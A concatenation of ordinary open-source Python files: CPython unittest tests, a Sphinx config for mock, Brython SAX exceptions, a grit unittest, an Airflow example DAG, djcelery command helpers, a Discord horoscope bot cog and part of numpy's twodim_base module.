class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
with self.assertRaises(KeyboardInterrupt):
klass('test_something').run()
def testSkippingEverywhere(self):
def _skip(self=None):
raise unittest.SkipTest('some reason')
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _skip
class Test2(unittest.TestCase):
setUp = _skip
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _skip
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_skip)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.skipped), 1)
self.assertEqual(result.testsRun, 1)
def testSystemExit(self):
def _raise(self=None):
raise SystemExit
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.errors), 1)
self.assertEqual(result.testsRun, 1)
@support.cpython_only
def testNoCycles(self):
case = unittest.TestCase()
wr = weakref.ref(case)
with support.disable_gc():
del case
self.assertFalse(wr())
def test_no_exception_leak(self):
# Issue #19880: TestCase.run() should not keep a reference
# to the exception
class MyException(Exception):
ninstance = 0
def __init__(self):
MyException.ninstance += 1
Exception.__init__(self)
def __del__(self):
MyException.ninstance -= 1
class TestCase(unittest.TestCase):
def test1(self):
raise MyException()
@unittest.expectedFailure
def test2(self):
raise MyException()
for method_name in ('test1', 'test2'):
testcase = TestCase(method_name)
testcase.run()
self.assertEqual(MyException.ninstance, 0)
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
fladi/mock
|
docs/conf.py
|
7
|
6297
|
# -*- coding: utf-8 -*-
#
# Mock documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 17 18:12:00 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
sys.path.insert(0, os.path.abspath('..'))
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest']
doctest_global_setup = """
import os
import sys
import mock
from mock import * # yeah, I know :-/
import unittest2
import __main__
if os.getcwd() not in sys.path:
sys.path.append(os.getcwd())
# keep a reference to __main__
sys.modules['__main'] = __main__
class ProxyModule(object):
def __init__(self):
self.__dict__ = globals()
sys.modules['__main__'] = ProxyModule()
"""
doctest_global_cleanup = """
sys.modules['__main__'] = sys.modules['__main']
"""
html_theme = 'nature'
html_theme_options = {}
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'Mock'
copyright = u'2007-2015, Michael Foord & the mock team'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents. Supplied by pbr.
#
# The short X.Y version.
version = None
# The full version, including alpha/beta/rc tags.
release = None
# There are two options for replacing |today|: either you set today to some
# non-false value, then it is used (set from pbr):
today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'adctheme.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Mockdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '12pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'Mock.tex', u'Mock Documentation',
u'Michael Foord', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False
|
bsd-2-clause
|
40223102/w16b_test
|
static/Brython3.1.1-20150328-091302/Lib/xml/sax/_exceptions.py
|
625
|
4885
|
"""Different kinds of SAX Exceptions"""
# In Brython the 4 lines below cause a $globals['Exception'] error
#import sys
#if sys.platform[:4] == "java":
# from java.lang import Exception
#del sys
# ===== SAXEXCEPTION =====
class SAXException(Exception):
"""Encapsulate an XML error or warning. This class can contain
basic error or warning information from either the XML parser or
the application: you can subclass it to provide additional
functionality, or to add localization. Note that although you will
receive a SAXException as the argument to the handlers in the
ErrorHandler interface, you are not actually required to raise
the exception; instead, you can simply read the information in
it."""
def __init__(self, msg, exception=None):
"""Creates an exception. The message is required, but the exception
is optional."""
self._msg = msg
self._exception = exception
Exception.__init__(self, msg)
def getMessage(self):
"Return a message for this exception."
return self._msg
def getException(self):
"Return the embedded exception, or None if there was none."
return self._exception
def __str__(self):
"Create a string representation of the exception."
return self._msg
def __getitem__(self, ix):
"""Avoids weird error messages if someone does exception[ix] by
mistake, since Exception has __getitem__ defined."""
raise AttributeError("__getitem__")
# ===== SAXPARSEEXCEPTION =====
class SAXParseException(SAXException):
"""Encapsulate an XML parse error or warning.
This exception will include information for locating the error in
the original XML document. Note that although the application will
receive a SAXParseException as the argument to the handlers in the
ErrorHandler interface, the application is not actually required
to raise the exception; instead, it can simply read the
information in it and take a different action.
Since this exception is a subclass of SAXException, it inherits
the ability to wrap another exception."""
def __init__(self, msg, exception, locator):
"Creates the exception. The exception parameter is allowed to be None."
SAXException.__init__(self, msg, exception)
self._locator = locator
# We need to cache this stuff at construction time.
# If this exception is raised, the objects through which we must
# traverse to get this information may be deleted by the time
# it gets caught.
self._systemId = self._locator.getSystemId()
self._colnum = self._locator.getColumnNumber()
self._linenum = self._locator.getLineNumber()
def getColumnNumber(self):
"""The column number of the end of the text where the exception
occurred."""
return self._colnum
def getLineNumber(self):
"The line number of the end of the text where the exception occurred."
return self._linenum
def getPublicId(self):
"Get the public identifier of the entity where the exception occurred."
return self._locator.getPublicId()
def getSystemId(self):
"Get the system identifier of the entity where the exception occurred."
return self._systemId
def __str__(self):
"Create a string representation of the exception."
sysid = self.getSystemId()
if sysid is None:
sysid = "<unknown>"
linenum = self.getLineNumber()
if linenum is None:
linenum = "?"
colnum = self.getColumnNumber()
if colnum is None:
colnum = "?"
return "%s:%s:%s: %s" % (sysid, linenum, colnum, self._msg)
# ===== SAXNOTRECOGNIZEDEXCEPTION =====
class SAXNotRecognizedException(SAXException):
"""Exception class for an unrecognized identifier.
An XMLReader will raise this exception when it is confronted with an
unrecognized feature or property. SAX applications and extensions may
use this class for similar purposes."""
pass
# ===== SAXNOTSUPPORTEDEXCEPTION =====
class SAXNotSupportedException(SAXException):
"""Exception class for an unsupported operation.
An XMLReader will raise this exception when a service it cannot
perform is requested (specifically setting a state or value). SAX
applications and extensions may use this class for similar
purposes."""
pass
# ===== SAXREADERNOTAVAILABLE =====
class SAXReaderNotAvailable(SAXNotSupportedException):
"""Exception class for a missing driver.
An XMLReader module (driver) should raise this exception when it
is first imported, e.g. when a support module cannot be imported.
It also may be raised during parsing, e.g. if executing an external
program is not permitted."""
pass
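# A short usage sketch, added for illustration (the locator stub is an
# assumption modelled on the getSystemId/getLineNumber/getColumnNumber calls
# made by SAXParseException.__init__ above):
def _example_parse_exception():
    class StubLocator(object):
        def getSystemId(self):
            return "doc.xml"
        def getPublicId(self):
            return None
        def getLineNumber(self):
            return 10
        def getColumnNumber(self):
            return 5
    exc = SAXParseException("not well-formed", None, StubLocator())
    # __str__ combines the cached system id, line and column with the message
    assert str(exc) == "doc.xml:10:5: not well-formed"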
|
agpl-3.0
|
wuhengzhi/chromium-crosswalk
|
tools/grit/grit/format/chrome_messages_json_unittest.py
|
23
|
3612
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittest for chrome_messages_json.py.
"""
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
import StringIO
from grit import grd_reader
from grit import util
from grit.tool import build
class ChromeMessagesJsonFormatUnittest(unittest.TestCase):
def testMessages(self):
root = util.ParseGrdForUnittest(u"""
<messages>
<message name="IDS_SIMPLE_MESSAGE">
Simple message.
</message>
<message name="IDS_QUOTES">
element\u2019s \u201c<ph name="NAME">%s<ex>name</ex></ph>\u201d attribute
</message>
<message name="IDS_PLACEHOLDERS">
<ph name="ERROR_COUNT">%1$d<ex>1</ex></ph> error, <ph name="WARNING_COUNT">%2$d<ex>1</ex></ph> warning
</message>
<message name="IDS_PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE">
<ph name="BEGIN">$1<ex>a</ex></ph>test<ph name="END">$2<ex>b</ex></ph>
</message>
<message name="IDS_STARTS_WITH_SPACE">
''' (<ph name="COUNT">%d<ex>2</ex></ph>)
</message>
<message name="IDS_ENDS_WITH_SPACE">
(<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_SPACE_AT_BOTH_ENDS">
''' (<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_DOUBLE_QUOTES">
A "double quoted" message.
</message>
<message name="IDS_BACKSLASH">
\\
</message>
</messages>
""")
buf = StringIO.StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'en'),
buf)
output = buf.getvalue()
test = u"""
{
"SIMPLE_MESSAGE": {
"message": "Simple message."
},
"QUOTES": {
"message": "element\\u2019s \\u201c%s\\u201d attribute"
},
"PLACEHOLDERS": {
"message": "%1$d error, %2$d warning"
},
"PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE": {
"message": "$1$test$2$",
"placeholders": {
"1": {
"content": "$1"
},
"2": {
"content": "$2"
}
}
},
"STARTS_WITH_SPACE": {
"message": " (%d)"
},
"ENDS_WITH_SPACE": {
"message": "(%d) "
},
"SPACE_AT_BOTH_ENDS": {
"message": " (%d) "
},
"DOUBLE_QUOTES": {
"message": "A \\"double quoted\\" message."
},
"BACKSLASH": {
"message": "\\\\"
}
}
"""
self.assertEqual(test.strip(), output.strip())
def testTranslations(self):
root = util.ParseGrdForUnittest("""
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
""")
buf = StringIO.StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'fr'), buf)
output = buf.getvalue()
test = u"""
{
"ID_HELLO": {
"message": "H\\u00e9P\\u00e9ll\\u00f4P\\u00f4!"
},
"ID_HELLO_USER": {
"message": "H\\u00e9P\\u00e9ll\\u00f4P\\u00f4 %s"
}
}
"""
self.assertEqual(test.strip(), output.strip())
class DummyOutput(object):
def __init__(self, type, language):
self.type = type
self.language = language
def GetType(self):
return self.type
def GetLanguage(self):
return self.language
def GetOutputFilename(self):
return 'hello.gif'
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
NielsZeilemaker/incubator-airflow
|
airflow/example_dags/example_subdag_operator.py
|
44
|
1696
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import airflow
from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.subdag_operator import SubDagOperator
from airflow.example_dags.subdags.subdag import subdag
DAG_NAME = 'example_subdag_operator'
args = {
'owner': 'airflow',
'start_date': airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id=DAG_NAME,
default_args=args,
schedule_interval="@once",
)
start = DummyOperator(
task_id='start',
default_args=args,
dag=dag,
)
section_1 = SubDagOperator(
task_id='section-1',
subdag=subdag(DAG_NAME, 'section-1', args),
default_args=args,
dag=dag,
)
some_other_task = DummyOperator(
task_id='some-other-task',
default_args=args,
dag=dag,
)
section_2 = SubDagOperator(
task_id='section-2',
subdag=subdag(DAG_NAME, 'section-2', args),
default_args=args,
dag=dag,
)
end = DummyOperator(
task_id='end',
default_args=args,
dag=dag,
)
start.set_downstream(section_1)
section_1.set_downstream(some_other_task)
some_other_task.set_downstream(section_2)
section_2.set_downstream(end)
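# A hedged sketch, not part of the original example: the wiring above yields
# a linear chain, which can be checked locally. topological_sort() is assumed
# from the Airflow 1.x DAG API.
if __name__ == "__main__":
    # expected order: start, section-1, some-other-task, section-2, end
    print([t.task_id for t in dag.topological_sort()])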
|
apache-2.0
|
AKSW/LODStats
|
lodstats/stats/Literals.py
|
2
|
1268
|
"""
Copyright 2013 AKSW Research Group http://aksw.org
This file is part of LODStats.
LODStats is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
LODStats is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with LODStats. If not, see <http://www.gnu.org/licenses/>.
"""
from .RDFStatInterface import RDFStatInterface
class Literals(RDFStatInterface):
"""
Number of literals
A literal is counted for every triple whose object is a literal (o_l)
"""
def __init__(self, results):
super(Literals, self).__init__(results)
self.c = 0
def count(self, s, p, o, s_blank, o_l, o_blank, statement):
if o_l:
self.c += 1
def postproc(self):
self.results['count'] = self.c
def voidify(self, void_model, dataset):
pass
def sparql(self, endpoint):
pass
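# A minimal usage sketch, added for illustration: the positional callback
# arguments are inferred from the count() signature above, and
# RDFStatInterface is assumed to store `results` on the instance.
if __name__ == "__main__":
    stat = Literals({})
    stat.count("ex:s", "ex:p", "a literal", False, True, False, None)
    stat.count("ex:s", "ex:p", "http://example.org/o", False, False, False, None)
    stat.postproc()
    print(stat.results)  # {'count': 1} -- only the literal object is counted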
|
gpl-3.0
|
hoosteeno/mozillians
|
vendor-local/lib/python/djcelery/management/base.py
|
15
|
3339
|
from __future__ import absolute_import
import os
import sys
from django.core.management.base import BaseCommand
import celery
import djcelery
DB_SHARED_THREAD = """\
DatabaseWrapper objects created in a thread can only \
be used in that same thread. The object with alias '%s' \
was created in thread id %s and this is thread id %s.\
"""
def patch_thread_ident():
# Monkey patch Django.
# This patch makes sure that we use real threads to get the ident,
# which matters when running under gevent or eventlet.
# -- patch taken from gunicorn
if getattr(patch_thread_ident, "called", False):
return
try:
from django.db.backends import BaseDatabaseWrapper, DatabaseError
if "validate_thread_sharing" in BaseDatabaseWrapper.__dict__:
import thread
_get_ident = thread.get_ident
__old__init__ = BaseDatabaseWrapper.__init__
def _init(self, *args, **kwargs):
__old__init__(self, *args, **kwargs)
self._thread_ident = _get_ident()
def _validate_thread_sharing(self):
if (not self.allow_thread_sharing
and self._thread_ident != _get_ident()):
raise DatabaseError(DB_SHARED_THREAD % (
self.alias, self._thread_ident, _get_ident()))
BaseDatabaseWrapper.__init__ = _init
BaseDatabaseWrapper.validate_thread_sharing \
= _validate_thread_sharing
patch_thread_ident.called = True
except ImportError:
pass
patch_thread_ident()
class CeleryCommand(BaseCommand):
options = BaseCommand.option_list
skip_opts = ["--app", "--loader", "--config"]
keep_base_opts = False
def get_version(self):
return "celery %s\ndjango-celery %s" % (celery.__version__,
djcelery.__version__)
def execute(self, *args, **options):
broker = options.get("broker")
if broker:
self.set_broker(broker)
super(CeleryCommand, self).execute(*args, **options)
def set_broker(self, broker):
os.environ["CELERY_BROKER_URL"] = broker
def run_from_argv(self, argv):
self.handle_default_options(argv[2:])
return super(CeleryCommand, self).run_from_argv(argv)
def handle_default_options(self, argv):
acc = []
broker = None
for i, arg in enumerate(argv):
if "--settings=" in arg:
_, settings_module = arg.split("=")
os.environ["DJANGO_SETTINGS_MODULE"] = settings_module
elif "--pythonpath=" in arg:
_, pythonpath = arg.split("=")
sys.path.insert(0, pythonpath)
elif "--broker=" in arg:
_, broker = arg.split("=")
elif arg == "-b":
broker = argv[i + 1]
else:
acc.append(arg)
if broker:
self.set_broker(broker)
return argv if self.keep_base_opts else acc
def die(self, msg):
sys.stderr.write(msg)
sys.stderr.write("\n")
sys.exit()
@property
def option_list(self):
return [x for x in self.options
if x._long_opts[0] not in self.skip_opts]
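    # Illustration (hypothetical argv, not part of djcelery): Django-level
    # options are consumed while everything else passes through, e.g.
    #
    #   cmd.handle_default_options(
    #       ["--settings=proj.settings", "--broker=amqp://", "worker"])
    #   # -> ["worker"]; DJANGO_SETTINGS_MODULE and CELERY_BROKER_URL end up
    #   # in os.environ as side effects.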
|
bsd-3-clause
|
Aioxas/ax-cogs
|
horoscope/horoscope.py
|
1
|
11258
|
from discord.ext import commands
from .utils.chat_formatting import box
import aiohttp
import html
import os
import re
try:
from PIL import Image, ImageDraw, ImageFont
PIL = True
except ImportError:
    PIL = False
class Horoscope:
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession()
@commands.command(name="horo", pass_context=True, no_pm=True)
@commands.cooldown(10, 60, commands.BucketType.user)
async def _horoscope(self, ctx, *, sign: str):
"""Retrieves today's horoscope for a zodiac sign.
Works with both signs and birthdays. Make sure to do Month/Day.
Western Zodiac:
Capricorn, Aquarius, Pisces, Aries, Taurus, Gemini, Cancer, Leo,
        Virgo, Libra, Scorpio, Sagittarius.
        For the Chinese zodiac, use a Chinese sign or a birth year.
Chinese Zodiac:
Ox, Goat, Rat, Snake, Dragon, Tiger, Rabbit, Horse, Monkey,
Rooster, Dog, Pig
Examples: [p]horo love, virgo
[p]horo chinese, rooster
[p]horo daily, virgo
[p]horo whatever, virgo
[p]horo chinese, 1901
[p]horo love, 02/10"""
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
                  'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/67.0.3396.99 Safari/537.36'}
signs = ["aries", "taurus", "gemini", "cancer", "leo",
"virgo", "libra", "scorpio", "sagittarius", "capricorn",
"aquarius", "pisces"]
chinese_signs = ["ox", "goat", "rat", "snake", "dragon", "tiger",
"rabbit", "horse", "monkey", "rooster", "dog", "pig"]
horo_styles = {"love": "https://www.horoscope.com/us/horoscopes/love/horoscope-love-daily-today.aspx?sign=",
"daily": "https://www.horoscope.com/us/horoscopes/general/horoscope-general-daily-today.aspx?sign=",
"chinese": "http://www.horoscope.com/us/horoscopes/chinese/horoscope-chinese-daily-today.aspx?sign="}
regex = [
"<strong( class=\"date\"|)>([^`]*?)<\/strong> - ([^`]*?)\n"]
subs = "\n\s*"
try:
horos = sign.split(', ')
style = horos[0]
horos.remove(style)
sign = horos[0].lower()
if style == "chinese":
if sign not in chinese_signs:
sign = self.getchinese_signs(int(sign)).lower()
uri = horo_styles[style]
sign_num = str(chinese_signs.index(sign) + 1)
                url = uri + sign_num
                async with self.session.get(url, headers=option) as resp:
test = str(await resp.text())
msg = re.findall(regex[0], test)[0]
msg_content = msg[2].replace("</p>", "")
msg = msg_content + " - " + msg[1]
await self.bot.say("Today's chinese horoscope for the one"
" born in the year of the {} is:\n"
.format(sign) + box(msg))
else:
if style not in horo_styles:
style = "daily"
if sign not in signs:
sign = sign.split("/")
Month = sign[0]
Day = sign[1]
sign = signs[self.getzodiac_signs(Month, Day)]
uri = horo_styles[style]
sign_num = str(signs.index(sign) + 1)
sign = list(sign)
sign[0] = sign[0].upper()
sign = "".join(sign)
                url = uri + sign_num
                async with self.session.get(url, headers=option) as resp:
test = str(await resp.text())
msg = re.findall(regex[0], test)[0]
msg_content = msg[2].replace("</p>", "")
msg = msg_content + " - " + msg[1]
if style == "love":
await self.bot.say("Today's love horoscope for **{}** is:\n"
.format(sign) + box(msg))
else:
await self.bot.say("Today's horoscope for **{}** is:\n"
.format(sign) + box(msg))
except (IndexError, ValueError):
await self.bot.say("Your search is not valid, please follow the "
"examples.\n[p]horo love, virgo\n[p]horo life,"
" pisces\n[p]horo whatever, sagittarius"
"\n[p]horo daily, virgo\n[p]horo chinese,"
" rooster")
def getzodiac_signs(self, Month, Day):
Month = int(Month)
Day = int(Day)
        # Date ranges ordered to line up with the aries-first `signs` list
        # used by the caller (index 0 == aries ... index 11 == pisces).
        times = [((Month == 3 and Day >= 20) or (Month == 4 and Day <= 19)),    # aries
                 ((Month == 4 and Day >= 20) or (Month == 5 and Day <= 20)),    # taurus
                 ((Month == 5 and Day >= 21) or (Month == 6 and Day <= 20)),    # gemini
                 ((Month == 6 and Day >= 21) or (Month == 7 and Day <= 22)),    # cancer
                 ((Month == 7 and Day >= 23) or (Month == 8 and Day <= 22)),    # leo
                 ((Month == 8 and Day >= 23) or (Month == 9 and Day <= 22)),    # virgo
                 ((Month == 9 and Day >= 23) or (Month == 10 and Day <= 22)),   # libra
                 ((Month == 10 and Day >= 23) or (Month == 11 and Day <= 21)),  # scorpio
                 ((Month == 11 and Day >= 22) or (Month == 12 and Day <= 21)),  # sagittarius
                 ((Month == 12 and Day >= 22) or (Month == 1 and Day <= 19)),   # capricorn
                 ((Month == 1 and Day >= 20) or (Month == 2 and Day <= 17)),    # aquarius
                 ((Month == 2 and Day >= 18) or (Month == 3 and Day <= 19))]    # pisces
        for i, matched in enumerate(times):
            if matched:
                return i
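        # Illustrative mapping (hypothetical input): Month=8, Day=25 matches
        # the virgo entry at index 5, and the caller resolves signs[5].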
def getchinese_signs(self, year):
czodiac = [(1900, "Rat"), (1901, "Ox"), (1902, "Tiger"),
(1903, "Rabbit"), (1904, "Dragon"), (1905, "Snake"),
(1906, "Horse"), (1907, "Sheep"), (1908, "Monkey"),
(1909, "Rooster"), (1910, "Dog"), (1911, "Pig")]
index = (year - czodiac[0][0]) % 12
return czodiac[index][1]
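        # e.g. 1993 -> (1993 - 1900) % 12 == 9 -> czodiac[9] -> "Rooster".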
@commands.command(name="tsujiura", no_pm=True, alias=["senbei"])
@commands.cooldown(10, 60, commands.BucketType.user)
async def _cookie(self):
"""Retrieves a random fortune cookie fortune."""
regex = ["class=\"cookie-link\">([^`]*?)<\/a>", "<p>([^`]*?)<\/p>",
"(?:\\\\['])", "<strong>([^`]*?)<\/strong>",
"<\/strong><\/a>([^`]*?)<br>",
"3\)<\/strong><\/a>([^`]*?)<\/div>"]
url = "http://www.fortunecookiemessage.com"
await self.file_check()
async with self.session.get(url, headers={"encoding": "utf-8"}) as resp:
test = str(await resp.text())
fortune = re.findall(regex[0], test)
fortest = re.match("<p>", fortune[0])
if fortest is not None:
fortune = re.findall(regex[1], fortune[0])
title = re.findall(regex[3], test)
info = re.findall(regex[4], test)
info[0] = html.unescape(info[0])
dailynum = re.findall(regex[5], test)
self.fortune_process(fortune[0])
await self.bot.say("Your fortune is:")
await self.bot.upload("data/horoscope/cookie-edit.png")
await self.bot.say("\n" + title[1] +
info[1] + "\n" + title[2] + dailynum[0])
os.remove("data/horoscope/cookie-edit.png")
async def file_check(self):
urls = ["https://images-2.discordapp.net/.eJwNwcENwyAMAMBdGABDCWCyDSKIoCYxwuZVdff27qPWvNSuTpHBO8DRudA8NAvN3Kp"
"uRO2qeXTWhW7IIrmcd32EwQbjMCRMaJNxPmwILxcRg_9Da_yWYoQ3dV5z6fE09f0BC6EjAw.B0sII_QLbL9kJo6Zbb4GuO4MQNw",
"https://cdn.discordapp.com/attachments/218222973557932032/240223136447070208/FortuneCookieNF.ttf"]
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)'
' Gecko/20100101 Firefox/40.1'}
if os.path.exists("data/horoscope/cookie.png"):
async with self.session.get(urls[0], headers=option) as resp:
test = await resp.read()
meow = False
with open("data/horoscope/cookie.png", "rb") as e:
if len(test) != len(e.read()):
meow = True
if meow:
with open("data/horoscope/cookie.png", "wb") as f:
f.write(test)
elif not os.path.exists("data/horoscope/cookie.png"):
async with self.session.get(urls[0], headers=option) as resp:
test = await resp.read()
with open("data/horoscope/cookie.png", "wb") as f:
f.write(test)
if not os.path.exists("data/horoscope/FortuneCookieNF.ttf"):
async with self.session.get(urls[1], headers=option) as resp:
test = await resp.read()
with open("data/horoscope/FortuneCookieNF.ttf", "wb") as f:
f.write(test)
@commands.command(name="font", no_pm=True)
@commands.cooldown(10, 60, commands.BucketType.user)
async def _font(self, url: str=None):
"""Allows you to set the font that the fortune cookies are shown in.
Only accepts ttf."""
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)'
' Gecko/20100101 Firefox/40.1'}
        if url is None:
            url = "https://cdn.discordapp.com/attachments/218222973557932032/240223136447070208/FortuneCookieNF.ttf"
            if os.path.isfile("data/horoscope/FortuneCookieNF.ttf"):
                return
        elif not url.endswith("ttf"):
            await self.bot.say("This is not a .ttf font, please use a .ttf font. Thanks")
            return
        async with self.session.get(url, headers=option) as resp:
            test = await resp.read()
        with open("data/horoscope/FortuneCookieNF.ttf", "wb") as f:
            f.write(test)
        await self.bot.say("Font has been saved")
def fortune_process(self, fortune):
img = Image.open("data/horoscope/cookie.png")
draw = ImageDraw.Draw(img)
font = ImageFont.truetype("data/horoscope/FortuneCookieNF.ttf", 15)
line = fortune.split()
sep = " "
line1 = sep.join(line[:5])
line2 = sep.join(line[5:10])
line3 = sep.join(line[10:])
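        # Naive three-line wrap for the cookie image: five words, five words,
        # then whatever remains.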
draw.text((134, 165), line1, (0, 0, 0), font=font, align="center")
draw.text((134, 180), line2, (0, 0, 0), font=font, align="center")
draw.text((134, 195), line3, (0, 0, 0), font=font, align="center")
img.save("data/horoscope/cookie-edit.png")
def check_folders():
if not os.path.exists("data/horoscope"):
print("Creating data/horoscope folder...")
os.mkdir("data/horoscope")
def setup(bot):
if PIL:
check_folders()
n = Horoscope(bot)
bot.add_cog(n)
else:
raise RuntimeError("You need to run 'pip3 install Pillow'")
|
mit
|
gfyoung/numpy
|
numpy/lib/twodim_base.py
|
2
|
27180
|
""" Basic functions for manipulating 2d arrays
"""
from __future__ import division, absolute_import, print_function
import functools
from numpy.core.numeric import (
absolute, asanyarray, arange, zeros, greater_equal, multiply, ones,
asarray, where, int8, int16, int32, int64, empty, promote_types, diagonal,
nonzero
)
from numpy.core import overrides
from numpy.core import iinfo, transpose
__all__ = [
'diag', 'diagflat', 'eye', 'fliplr', 'flipud', 'tri', 'triu',
'tril', 'vander', 'histogram2d', 'mask_indices', 'tril_indices',
'tril_indices_from', 'triu_indices', 'triu_indices_from', ]
array_function_dispatch = functools.partial(
overrides.array_function_dispatch, module='numpy')
i1 = iinfo(int8)
i2 = iinfo(int16)
i4 = iinfo(int32)
def _min_int(low, high):
""" get small int that fits the range """
if high <= i1.max and low >= i1.min:
return int8
if high <= i2.max and low >= i2.min:
return int16
if high <= i4.max and low >= i4.min:
return int32
return int64
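# For example, _min_int(0, 100) returns int8 (100 <= i1.max == 127), while
# _min_int(0, 300) returns int16 because 300 exceeds i1.max.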
def _flip_dispatcher(m):
return (m,)
@array_function_dispatch(_flip_dispatcher)
def fliplr(m):
"""
Flip array in the left/right direction.
Flip the entries in each row in the left/right direction.
Columns are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array, must be at least 2-D.
